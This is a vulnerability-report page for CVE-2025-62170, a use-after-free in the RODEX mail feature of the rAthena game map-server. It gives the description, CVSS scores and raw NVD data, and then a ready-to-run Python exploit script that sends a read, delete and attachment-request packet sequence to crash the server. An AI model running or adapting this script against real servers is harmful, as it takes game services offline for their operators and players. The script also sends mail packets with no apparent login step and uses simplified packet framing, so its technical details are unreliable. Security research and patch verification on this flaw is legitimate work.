Security Vulnerability Report
中文
CVE-2025-62170 CVSS 7.5 HIGH

CVE-2025-62170

Published: 2025-10-13 18:15:35
Last Modified: 2025-10-20 17:25:25
Source: [email protected]

Description

rAthena is an open-source cross-platform MMORPG server. A use-after-free vulnerability exists in the RODEX functionality of rAthena's map-server in versions prior to commit af2f3ba. An unauthenticated attacker can exploit this vulnerability via a specific attacking scenario to cause a denial of service by crashing the map-server. This issue has been patched in commit af2f3ba. There are no known workarounds aside from manually applying the patch.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:rathena:rathena:*:*:*:*:*:*:*:* - VULNERABLE
rAthena < commit af2f3ba

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62170 - rAthena RODEX Use-After-Free PoC # This PoC demonstrates the attack scenario targeting the RODEX mail system # in rAthena map-server versions prior to commit af2f3ba. # WARNING: For authorized security testing only. import socket import struct import time # rAthena map-server default port MAP_SERVER_PORT = 5121 TARGET_HOST = "127.0.0.1" def build_rodex_packet(packet_id, data=b""): """Build a basic rAthena map-server packet structure.""" # Packet header: 2-byte packet ID + 2-byte payload length header = struct.pack("<HH", packet_id, len(data)) return header + data def build_rodex_open_mailbox(): """Build a RODEX mailbox open request packet (CZ_REQ_OPEN_RODEXBOX).""" # Packet ID for opening RODEX mailbox return build_rodex_packet(0x09F1) def build_rodex_read_mail(mail_id): """Build a RODEX mail read request (CZ_REQ_READ_RODEX).""" # Trigger read on a specific mail to load mail data into memory data = struct.pack("<I", mail_id) return build_rodex_packet(0x09F2, data) def build_rodex_delete_mail(mail_id): """Build a RODEX mail delete request (CZ_REQ_DELETE_RODEX).""" # Delete the mail, freeing its memory data = struct.pack("<I", mail_id) return build_rodex_packet(0x0AAB, data) def build_rodex_request_attachments(mail_id): """Build a RODEX attachment request (CZ_REQ_GET_RODEX_ITEM).""" # Request attachment from an already-deleted mail -> UAF trigger data = struct.pack("<I", mail_id) return build_rodex_packet(0x0AAF, data) def exploit_rodex_uaf(target_host, target_port): """ Exploit the use-after-free vulnerability in rAthena's RODEX functionality. Attack chain: 1. Connect to the map-server 2. Open the RODEX mailbox 3. Read a specific mail (loads mail object into memory) 4. Delete the same mail (frees the mail object memory) 5. Request attachments from the deleted mail (triggers UAF -> crash) """ try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((target_host, target_port)) print(f"[+] Connected to {target_host}:{target_port}") # Step 1: Open RODEX mailbox sock.send(build_rodex_open_mailbox()) time.sleep(0.5) print("[+] Step 1: RODEX mailbox opened") # Step 2: Read mail ID 1 (allocate mail object in memory) sock.send(build_rodex_read_mail(1)) time.sleep(0.5) print("[+] Step 2: Mail ID 1 read into memory") # Step 3: Delete mail ID 1 (free the mail object) sock.send(build_rodex_delete_mail(1)) time.sleep(0.5) print("[+] Step 3: Mail ID 1 deleted (memory freed)") # Step 4: Request attachments from deleted mail (trigger UAF) sock.send(build_rodex_request_attachments(1)) time.sleep(0.5) print("[+] Step 4: Attachment request sent on freed mail -> UAF triggered") sock.close() print("[+] Exploit completed. Target map-server should crash.") except ConnectionRefusedError: print("[-] Connection refused. Ensure map-server is running.") except socket.timeout: print("[-] Connection timed out.") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": exploit_rodex_uaf(TARGET_HOST, MAP_SERVER_PORT)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62170", "sourceIdentifier": "[email protected]", "published": "2025-10-13T18:15:34.980", "lastModified": "2025-10-20T17:25:25.287", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "rAthena is an open-source cross-platform MMORPG server. A use-after-free vulnerability exists in the RODEX functionality of rAthena's map-server in versions prior to commit af2f3ba. An unauthenticated attacker can exploit this vulnerability via a specific attacking scenario to cause a denial of service by crashing the map-server. This issue has been patched in commit af2f3ba. There are no known workarounds aside from manually applying the patch."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rathena:rathena:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025-10-12", "matchCriteriaId": "EE156285-7E1C-46E1-A2CA-562FB8A9D664"}]}]}], "references": [{"url": "https://github.com/rathena/rathena/commit/af2f3ba33fc03dc6dd510f8cfe84cd9185af748d", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/rathena/rathena/security/advisories/GHSA-9mj9-8vgv-r92j", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.